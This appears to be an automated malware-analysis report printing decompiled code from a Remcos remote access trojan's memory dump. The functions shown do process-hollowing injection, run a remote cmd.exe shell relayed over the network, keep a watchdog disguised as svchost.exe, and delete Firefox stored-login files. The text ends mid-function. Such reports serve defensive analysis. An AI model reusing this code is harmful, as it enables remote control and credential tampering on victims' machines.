                                                                                                							if(_t73 == 0) {
                                                                                                								goto L20;
                                                                                                							} else {
                                                                                                								_t113 = _v16;
                                                                                                								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
                                                                                                									goto L20;
                                                                                                								}
                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                								if(0 >=  *(_t95 + 6)) {
                                                                                                									L14:
                                                                                                									_t98 = _t95 + 0x34;
                                                                                                									_t114 = _v20;
                                                                                                									if(_v8 ==  *_t98) {
                                                                                                										L17:
                                                                                                										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                                                                                                										_t48 =  &(_t116->hThread); // 0xffffdd03
                                                                                                										if(SetThreadContext( *_t48, _t114) == 0) {
                                                                                                											goto L20;
                                                                                                										}
                                                                                                										_t49 =  &(_t116->hThread); // 0xffffdd03
                                                                                                										if(ResumeThread( *_t49) == 0xffffffff) {
                                                                                                											goto L20;
                                                                                                										}
                                                                                                										_t58 = 1;
                                                                                                										goto L22;
                                                                                                									}
                                                                                                									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
                                                                                                									if(_t83 != 0) {
                                                                                                										goto L17;
                                                                                                									}
                                                                                                									TerminateProcess(_t116->hProcess, _t83);
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								_t104 = 0;
                                                                                                								_v16 = 0;
                                                                                                								do {
                                                                                                									_t28 = _t113 + 0x3c; // 0x83ffc983
                                                                                                									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
                                                                                                									_t37 =  &_v16; // 0x414d39
                                                                                                									_t102 = _v12 + 1;
                                                                                                									_t104 =  *_t37 + 0x28;
                                                                                                									_v12 = _t102;
                                                                                                									_v16 = _t104;
                                                                                                								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                                                                                                								goto L14;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_t58 = 0;
                                                                                                					goto L23;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}
























                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 9MA
                                                                                                • API String ID: 0-2432124739
                                                                                                • Opcode ID: ab9735e6901d4979b8adc38f45d8b4ae0f4aafad0fef2e90a1dcfdb6a44d71b9
                                                                                                • Instruction ID: be3675743dd1187929dd058ad4bef95e5a30998592e5cbd9f41aad8c7f2322ed
                                                                                                • Opcode Fuzzy Hash: ab9735e6901d4979b8adc38f45d8b4ae0f4aafad0fef2e90a1dcfdb6a44d71b9
                                                                                                • Instruction Fuzzy Hash: 3451DF70600605FFEB109FA5DC44FAABBB9FF88305F104025FA45EA2A1D775D891DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E004057A3(char _a4) {
                                                                                                				long _v8;
                                                                                                				long _v12;
                                                                                                				long _v16;
                                                                                                				void* _v20;
                                                                                                				char _v44;
                                                                                                				char _v68;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				long _t56;
                                                                                                				void* _t60;
                                                                                                				void* _t68;
                                                                                                				void* _t69;
                                                                                                				void* _t73;
                                                                                                				void* _t82;
                                                                                                				CHAR* _t83;
                                                                                                				int _t85;
                                                                                                				int _t101;
                                                                                                				intOrPtr* _t111;
                                                                                                				intOrPtr _t142;
                                                                                                				signed int _t146;
                                                                                                				signed int _t147;
                                                                                                				long _t152;
                                                                                                				void* _t155;
                                                                                                				intOrPtr* _t156;
                                                                                                				void* _t162;
                                                                                                				void* _t167;
                                                                                                				void* _t174;
                                                                                                
                                                                                                				_t156 = _t155 - 0x44;
                                                                                                				_push(_t146);
                                                                                                				_t142 =  *((intOrPtr*)( *[fs:0x2c]));
                                                                                                				_t147 = _t146 | 0xffffffff;
                                                                                                				_t101 = 0;
                                                                                                				if( *0x46fe78 >  *((intOrPtr*)(_t142 + 4))) {
                                                                                                					E0042FE69(0x46fe78);
                                                                                                					_t159 =  *0x46fe78 - _t147;
                                                                                                					if( *0x46fe78 == _t147) {
                                                                                                						E004047EF(0);
                                                                                                						E004301F3(_t159, E00453956);
                                                                                                						 *_t156 = 0x46fe78;
                                                                                                						E0042FE2A(_t147);
                                                                                                					}
                                                                                                				}
                                                                                                				if( *0x46fe58 >  *((intOrPtr*)(_t142 + 4))) {
                                                                                                					E0042FE69(0x46fe58);
                                                                                                					_t161 =  *0x46fe58 - _t147;
                                                                                                					if( *0x46fe58 == _t147) {
                                                                                                						E004020C7(_t101, 0x46fe80);
                                                                                                						E004301F3(_t161, E0045394C);
                                                                                                						E0042FE2A(_t147, 0x46fe58);
                                                                                                					}
                                                                                                				}
                                                                                                				_t103 =  &_v44;
                                                                                                				E004020C7(_t101,  &_v44);
                                                                                                				_t143 = CloseHandle;
                                                                                                				_v8 = _t101;
                                                                                                				_t162 =  *0x46dad6 - _t101; // 0x0
                                                                                                				if(_t162 != 0) {
                                                                                                					L11:
                                                                                                					_v12 = _t101;
                                                                                                					PeekNamedPipe( *0x46fe60, _t101, _t101, _t101,  &_v12, _t101);
                                                                                                					if(_v12 <= _t101) {
                                                                                                						_t156 = _t156 - 0x18;
                                                                                                						E00402076(_t101, _t156, 0x460734);
                                                                                                						_push(0x62);
                                                                                                						_t147 = E00404BB7(_t101, 0x46fdd8, _t140, __eflags);
                                                                                                						goto L21;
                                                                                                					}
                                                                                                					_push(_v12);
                                                                                                					_t60 = E0043776E(_t103);
                                                                                                					_v20 = _t60;
                                                                                                					ReadFile( *0x46fe60, _t60, _v12,  &_v16, _t101);
                                                                                                					if(_v16 <= _t101) {
                                                                                                						L19:
                                                                                                						L00437769(_v20);
                                                                                                						goto L21;
                                                                                                					}
                                                                                                					if(_v8 <= _t101) {
                                                                                                						_t148 = _v20;
                                                                                                						L17:
                                                                                                						E00402076(_t101,  &_v68, _t148);
                                                                                                						_t156 = _t156 - 0x18;
                                                                                                						_t111 = _t156;
                                                                                                						_push(_v16);
                                                                                                						_push(_t101);
                                                                                                						L18:
                                                                                                						E00405BC0(_t101, _t111, _t140, _t171);
                                                                                                						_t147 = E00404BB7(_t101, 0x46fdd8, _t140, _t171, 0x62,  &_v68);
                                                                                                						E00401FB9();
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					_t68 = E00401F87( &_v44);
                                                                                                					_t148 = _v20;
                                                                                                					_t69 = E00437780(_v20, _t68, _v8);
                                                                                                					_t156 = _t156 + 0xc;
                                                                                                					_t171 = _t69;
                                                                                                					if(_t69 != 0) {
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					E00402076(_t101,  &_v68, _t148);
                                                                                                					_t156 = _t156 - 0x18;
                                                                                                					_t111 = _t156;
                                                                                                					_push(_v16 - _v8);
                                                                                                					_push(_v8);
                                                                                                					goto L18;
                                                                                                				} else {
                                                                                                					_t140 = "cmd.exe";
                                                                                                					_t73 = E00405C1B("cmd.exe");
                                                                                                					_t163 = _t73;
                                                                                                					if(_t73 == 0) {
                                                                                                						L26:
                                                                                                						E00404F18(0x46fdd8, _t140);
                                                                                                						CloseHandle( *0x46fe60);
                                                                                                						CloseHandle( *0x46fe7c);
                                                                                                						 *0x46dad6 = _t101;
                                                                                                						_t101 = 1;
                                                                                                						L27:
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						return _t101;
                                                                                                					}
                                                                                                					E00405BB7(_t101, 0x46fe80, E00437AFA(_t101, _t163, "SystemDrive"));
                                                                                                					E00405479(_t101, 0x46fe80, CloseHandle, "\\");
                                                                                                					0x46fd80->nLength = 0xc;
                                                                                                					 *0x46fd88 = 1;
                                                                                                					 *0x46fd84 = _t101;
                                                                                                					if(CreatePipe(0x46fe74, 0x46fe5c, 0x46fd80, _t101) == 0 || CreatePipe(0x46fe60, 0x46fe7c, 0x46fd80, _t101) == 0) {
                                                                                                						goto L27;
                                                                                                					} else {
                                                                                                						_t152 = 0x44;
                                                                                                						E00432D80(CloseHandle, 0x46fd90, _t101, CreatePipe);
                                                                                                						0x46fd90->cb = _t152;
                                                                                                						 *0x46fdbc = 0x101;
                                                                                                						 *0x46fdc0 = 0;
                                                                                                						 *0x46fdc8 =  *0x46fe74;
                                                                                                						_t82 =  *0x46fe7c;
                                                                                                						 *0x46fdcc = _t82;
                                                                                                						 *0x46fdd0 = _t82;
                                                                                                						_t83 = E00401F87(0x46fe80);
                                                                                                						_t85 = CreateProcessA(_t101, E00401F87(0x46e300), _t101, _t101, 1, _t101, _t101, _t83, 0x46fd90, 0x46fe64);
                                                                                                						_t166 = _t85;
                                                                                                						 *0x46dad6 = _t85 != 0;
                                                                                                						E00405BB7(_t101, 0x46e300, 0x460734);
                                                                                                						 *0x46dad7 = 1;
                                                                                                						E00404943(0x46fdd8);
                                                                                                						E004049DE(0x46fdd8, 0x46fdd8, 0x46fdd8);
                                                                                                						_t156 = _t156 + 0xc - 0x18;
                                                                                                						E004020DE(_t101, _t156, "cmd.exe", _t85,  &_a4);
                                                                                                						_push(0x93);
                                                                                                						_t103 = 0x46fdd8;
                                                                                                						_t147 = E00404BB7(_t101, 0x46fdd8, _t140, _t166);
                                                                                                						Sleep(0x12c);
                                                                                                						_t167 =  *0x46dad6 - _t101; // 0x0
                                                                                                						if(_t167 == 0) {
                                                                                                							goto L26;
                                                                                                						} else {
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						do {
                                                                                                							goto L11;
                                                                                                							L21:
                                                                                                							_t42 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
                                                                                                							_t103 = 0x46e300;
                                                                                                							 *0x46dad7 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
                                                                                                							if(E0040247B() == 0) {
                                                                                                								_v8 = _t101;
                                                                                                							} else {
                                                                                                								E00405479(_t101, 0x46e300, _t143, "\n");
                                                                                                								E00401F9F( &_v44, 0x46e300);
                                                                                                								_t56 = E0040247B();
                                                                                                								WriteFile( *0x46fe5c, E00401F87(0x46e300), _t56,  &_v8, _t101);
                                                                                                								_t103 = 0x46e300;
                                                                                                								E00405BB7(_t101, 0x46e300, 0x460734);
                                                                                                							}
                                                                                                							Sleep(0x64);
                                                                                                							_t174 =  *0x46dad7 - _t101; // 0x0
                                                                                                						} while (_t174 != 0);
                                                                                                						TerminateProcess(0x46fe64->hProcess, _t101);
                                                                                                						CloseHandle( *0x46fe68);
                                                                                                						CloseHandle( *0x46fe64);
                                                                                                						goto L26;
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004057F5
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • __Init_thread_footer.LIBCMT ref: 00405832
                                                                                                • CreatePipe.KERNEL32(0046FE74,0046FE5C,0046FD80,00000000,0046074C,00000000), ref: 004058C0
                                                                                                • CreatePipe.KERNEL32(0046FE60,0046FE7C,0046FD80,00000000), ref: 004058DA
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046FD90,0046FE64), ref: 00405950
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 004059A7
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059CA
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004059F4
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046E300,00460750,00000062,00460734), ref: 00405AF4
                                                                                                  • Part of subcall function 004301F3: __onexit.LIBCMT ref: 004301F9
                                                                                                • Sleep.KERNEL32(00000064,00000062,00460734), ref: 00405B10
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405B29
                                                                                                • CloseHandle.KERNEL32 ref: 00405B35
                                                                                                • CloseHandle.KERNEL32 ref: 00405B3D
                                                                                                • CloseHandle.KERNEL32 ref: 00405B4F
                                                                                                • CloseHandle.KERNEL32 ref: 00405B57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: SystemDrive$cmd.exe
                                                                                                • API String ID: 2994406822-3633465311
                                                                                                • Opcode ID: f3c5ffdd50d09cf36f876653c701838baa820f740dc9857a7c617ea70b4f690e
                                                                                                • Instruction ID: 48659864446c9a7ff021c0de4bd636dfa13afc93547c7ec003e93ee943616f91
                                                                                                • Opcode Fuzzy Hash: f3c5ffdd50d09cf36f876653c701838baa820f740dc9857a7c617ea70b4f690e
                                                                                                • Instruction Fuzzy Hash: D291D571A04214ABDB00BBA5EC55D6E3B69EB40708B10007BF542B72E2EBB96D44CF5E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0040FB05(void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v36;
                                                                                                				void* _v40;
                                                                                                				char _v56;
                                                                                                				void* _v64;
                                                                                                				char _v76;
                                                                                                				char _v84;
                                                                                                				void* _v88;
                                                                                                				char _v100;
                                                                                                				char _v104;
                                                                                                				void* _v108;
                                                                                                				char _v124;
                                                                                                				char _v128;
                                                                                                				long _v132;
                                                                                                				char _v148;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				long _t26;
                                                                                                				void* _t29;
                                                                                                				void* _t35;
                                                                                                				void* _t46;
                                                                                                				void* _t61;
                                                                                                				void* _t78;
                                                                                                				void* _t107;
                                                                                                				long _t112;
                                                                                                				long _t141;
                                                                                                				void* _t142;
                                                                                                				CHAR* _t143;
                                                                                                				void* _t145;
                                                                                                				signed int _t147;
                                                                                                				void* _t149;
                                                                                                				void* _t155;
                                                                                                
                                                                                                				_t149 = (_t147 & 0xfffffff8) - 0x7c;
                                                                                                				_push(_t142);
                                                                                                				_t26 = GetCurrentProcessId();
                                                                                                				if(E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "WD", _t26) != 0) {
                                                                                                					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                                                                                                					__eflags = _t29;
                                                                                                					if(_t29 == 0) {
                                                                                                						E004020C7(0x46e5a8,  &_v100);
                                                                                                						E004183CC(E00401EDD(0x46e590),  &_v100);
                                                                                                						E00401F5F(0x46e5a8,  &_v124);
                                                                                                						__eflags = E00418004( &_v124);
                                                                                                						if(__eflags != 0) {
                                                                                                							_t35 = E00404260(0x46e5a8,  &_v76, L"\\SysWOW64");
                                                                                                							E00401EEC( &_v132, _t37, _t142, E00403022( &_v36, E00404260(0x46e5a8,  &_v56, E00437AEF(0x46e5a8,  &_v76, __eflags, L"WinDir")), _t35));
                                                                                                							E00401EE2();
                                                                                                							E00401EE2();
                                                                                                						} else {
                                                                                                							_t61 = E00404260(0x46e5a8,  &_v28, L"\\system32");
                                                                                                							E00401EEC( &_v132, _t63, _t142, E00403022( &_v84, E00404260(0x46e5a8,  &_v56, E00437AEF(0x46e5a8,  &_v28, __eflags, L"WinDir")), _t61));
                                                                                                							E00401EE2();
                                                                                                							E00401EE2();
                                                                                                						}
                                                                                                						E00401EE2();
                                                                                                						E0040778C(0x46e5a8,  &_v124, 0, L"\\svchost.exe");
                                                                                                						_t143 = E00401F87( &_v104);
                                                                                                						_t46 = E00414B29(E00401EDD( &_v128), _t143, 0x46dd44);
                                                                                                						_t150 = _t149 - 0x18;
                                                                                                						_t107 = _t149 - 0x18;
                                                                                                						__eflags = _t46;
                                                                                                						if(_t46 != 0) {
                                                                                                							E00402076(0x46e5a8, _t107, "Watchdog module activated");
                                                                                                							E00402076(0x46e5a8, _t150 - 0x18, "i");
                                                                                                							E00417670(0x46e5a8, 0);
                                                                                                							Sleep(0x7d0);
                                                                                                							_t112 =  *0x46dd4c; // 0x0
                                                                                                							goto L13;
                                                                                                						}
                                                                                                						E00402076(0x46e5a8, _t107, "Watchdog launch failed!");
                                                                                                						E00402076(0x46e5a8, _t150 - 0x18, "E");
                                                                                                						E00417670(0x46e5a8, 0);
                                                                                                						CloseHandle( *0x46dd54);
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                						_push(3);
                                                                                                						_pop(1);
                                                                                                					} else {
                                                                                                						CloseHandle(_t29);
                                                                                                						_t155 = _t149 - 0x18;
                                                                                                						E00402076(0x46e5a8, _t155, "Remcos restarted by watchdog!");
                                                                                                						_t156 = _t155 - 0x18;
                                                                                                						E00402076(0x46e5a8, _t155 - 0x18, "i");
                                                                                                						E00417670(0x46e5a8, 0);
                                                                                                						E00402076(0x46e5a8, _t156 + 0x18, "Watchdog module activated");
                                                                                                						E00402076(0x46e5a8, _t156 + 0x18 - 0x18, "i");
                                                                                                						E00417670(0x46e5a8, 0);
                                                                                                						CreateThread(0, 0, E00410137, 0, 0, 0);
                                                                                                						_t143 = "WDH";
                                                                                                						_t78 = E004108B4(E00401F87(0x46e5a8), _t143,  &_v148);
                                                                                                						__eflags = _t78;
                                                                                                						if(_t78 == 0) {
                                                                                                							goto L1;
                                                                                                						} else {
                                                                                                							 *0x46dd44 = OpenProcess(0x1fffff, 0, _v132);
                                                                                                							E00410D11(E00401F87(0x46e5a8), __eflags, _t143);
                                                                                                							_t112 = _v132;
                                                                                                							L13:
                                                                                                							L14();
                                                                                                							asm("int3");
                                                                                                							_push(_t143);
                                                                                                							_push(0);
                                                                                                							_t141 = _t112;
                                                                                                							L15:
                                                                                                							_t145 = OpenProcess(0x100000, 0, _t141);
                                                                                                							WaitForSingleObject(_t145, 0xffffffff);
                                                                                                							CloseHandle(_t145);
                                                                                                							__eflags =  *0x46dd42;
                                                                                                							if(__eflags != 0) {
                                                                                                								E0040FB05(__eflags, 0);
                                                                                                							}
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						L17:
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                				}
                                                                                                				return 1;
                                                                                                				goto L17;
                                                                                                			}

                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FB11
                                                                                                  • Part of subcall function 00410BDF: RegCreateKeyA.ADVAPI32(80000001,00000000,00460734), ref: 00410BED
                                                                                                  • Part of subcall function 00410BDF: RegSetValueExA.ADVAPI32(00460734,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A69E,00460F78,00000001,000000AF,00460734), ref: 00410C08
                                                                                                  • Part of subcall function 00410BDF: RegCloseKey.ADVAPI32(00460734,?,?,?,0040A69E,00460F78,00000001,000000AF,00460734), ref: 00410C13
                                                                                                • OpenMutexA.KERNEL32 ref: 0040FB4B
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB5A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00410137,00000000,00000000,00000000), ref: 0040FBB0
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64$\svchost.exe$\system32
                                                                                                • API String ID: 3018269243-1741345798
                                                                                                • Opcode ID: 2886b422811ca8092402f0a6ac9f4f1ef6b55b0c540f70e3be7190a8f89610cd
                                                                                                • Instruction ID: fdc96c652a9365d98c3a529de633bd4b0e23c82eb85e7c32280dbd54f168b04c
                                                                                                • Opcode Fuzzy Hash: 2886b422811ca8092402f0a6ac9f4f1ef6b55b0c540f70e3be7190a8f89610cd
                                                                                                • Instruction Fuzzy Hash: AE51C531A0430167C214FB72DC5BD6E77A89E8175DF20043FF942661E2EEB89949C6AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E0040A047(void* __ebx, void* __edi, void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				struct _WIN32_FIND_DATAA _v468;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t45;
                                                                                                				signed int _t58;
                                                                                                				signed int _t59;
                                                                                                				signed int _t73;
                                                                                                				signed int _t75;
                                                                                                				char* _t108;
                                                                                                				signed int _t109;
                                                                                                				char* _t129;
                                                                                                				void* _t130;
                                                                                                				void* _t134;
                                                                                                				void* _t135;
                                                                                                				void* _t136;
                                                                                                				void* _t137;
                                                                                                
                                                                                                				_t142 = __eflags;
                                                                                                				_t134 = __edi;
                                                                                                				_t89 = __ebx;
                                                                                                				E004020C7(__ebx,  &_v100);
                                                                                                				E004020C7(__ebx,  &_v76);
                                                                                                				E004020C7(__ebx,  &_v28);
                                                                                                				_t45 = E00402076(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                                                                                				E00401FC3( &_v28, _t46, _t135, E004053F2(_t89,  &_v52, E00437AFA(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				_t128 =  &_v28;
                                                                                                				_t136 = FindFirstFileA(E00401F87(E004076DF( &_v124,  &_v28, _t142, "*")),  &_v468);
                                                                                                				E00401FB9();
                                                                                                				_t143 = _t136 - 0xffffffff;
                                                                                                				if(_t136 != 0xffffffff) {
                                                                                                					while(1) {
                                                                                                						L15:
                                                                                                						__eflags = FindNextFileA(_t136,  &_v468);
                                                                                                						if(__eflags == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags = _v468.dwFileAttributes & 0x00000010;
                                                                                                						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                                                                                                							continue;
                                                                                                						}
                                                                                                						_t108 =  &(_v468.cFileName);
                                                                                                						__eflags =  *_t108 - 0x2e;
                                                                                                						if( *_t108 != 0x2e) {
                                                                                                							L5:
                                                                                                							_t129 =  &(_v468.cFileName);
                                                                                                							_t109 = 0;
                                                                                                							__eflags = 0;
                                                                                                							while(1) {
                                                                                                								_t58 =  *(_t129 + _t109) & 0x000000ff;
                                                                                                								_t130 = "..";
                                                                                                								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                                                                                                								_t128 =  &(_v468.cFileName);
                                                                                                								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t109 = _t109 + 1;
                                                                                                								__eflags = _t109 - 3;
                                                                                                								if(_t109 != 3) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								_t59 = 0;
                                                                                                								L10:
                                                                                                								__eflags = _t59;
                                                                                                								if(__eflags != 0) {
                                                                                                									E00401FC3( &_v100, _t61, _t136, E004076BB(_t89,  &_v52, E004076DF( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									_t128 = E004076DF( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                                                                                                									E00401FC3( &_v76, _t67, _t136, E004076BB(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                                                                                                									E00401FB9();
                                                                                                									E00401FB9();
                                                                                                									_t73 = DeleteFileA(E00401F87( &_v100));
                                                                                                									__eflags = _t73;
                                                                                                									if(_t73 == 0) {
                                                                                                										GetLastError();
                                                                                                									}
                                                                                                									_t75 = DeleteFileA(E00401F87( &_v76));
                                                                                                									__eflags = _t75;
                                                                                                									if(_t75 == 0) {
                                                                                                										GetLastError();
                                                                                                									}
                                                                                                								}
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							asm("sbb eax, eax");
                                                                                                							_t59 = _t58 | 0x00000001;
                                                                                                							__eflags = _t59;
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						__eflags =  *(_t108 + 1) & 0x000000ff;
                                                                                                						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                                                                                                							continue;
                                                                                                						}
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					E00402076(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                                                                                                					E0040A724(_t89, _t128, __eflags);
                                                                                                					FindClose(_t136);
                                                                                                					goto L17;
                                                                                                				} else {
                                                                                                					FindClose(_t136);
                                                                                                					E00402076(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                                                                                                					E0040A724(_t89,  &_v28, _t143);
                                                                                                					L17:
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}


























                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A0C6
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A0E0
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040A217
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A23D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: 560460167a3b74f6031a92c36ca8f67955c33202d556ce5097b1ea10add73373
                                                                                                • Instruction ID: 1a82a04086bb8537bde070ddbd888ea8d6581ef07c280fc06d4a0d33395de579
                                                                                                • Opcode Fuzzy Hash: 560460167a3b74f6031a92c36ca8f67955c33202d556ce5097b1ea10add73373
                                                                                                • Instruction Fuzzy Hash: 45515D709102195ACB14F7A5DC56EEEB768AF11308F1001BEF406761E2EF789A89CA5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E0040A262(void* __edi, void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				struct _WIN32_FIND_DATAA _v444;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t35;
                                                                                                				signed int _t56;
                                                                                                				signed int _t57;
                                                                                                				long _t68;
                                                                                                				char* _t92;
                                                                                                				signed int _t93;
                                                                                                				void* _t102;
                                                                                                				char* _t105;
                                                                                                				void* _t106;
                                                                                                				void* _t108;
                                                                                                				void* _t109;
                                                                                                				void* _t110;
                                                                                                				void* _t111;
                                                                                                
                                                                                                				_t116 = __eflags;
                                                                                                				_t108 = __edi;
                                                                                                				E004020C7(0,  &_v52);
                                                                                                				E004020C7(0,  &_v28);
                                                                                                				_t35 = E00402076(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                                                                                				E00401FC3( &_v28, _t36, _t109, E004053F2(0,  &_v76, E00437AFA(0, __eflags, "UserProfile"), _t108, _t116, _t35));
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				_t104 =  &_v28;
                                                                                                				_t110 = FindFirstFileA(E00401F87(E004076DF( &_v100,  &_v28, _t116, "*")),  &_v444);
                                                                                                				E00401FB9();
                                                                                                				_t117 = _t110 - 0xffffffff;
                                                                                                				if(_t110 != 0xffffffff) {
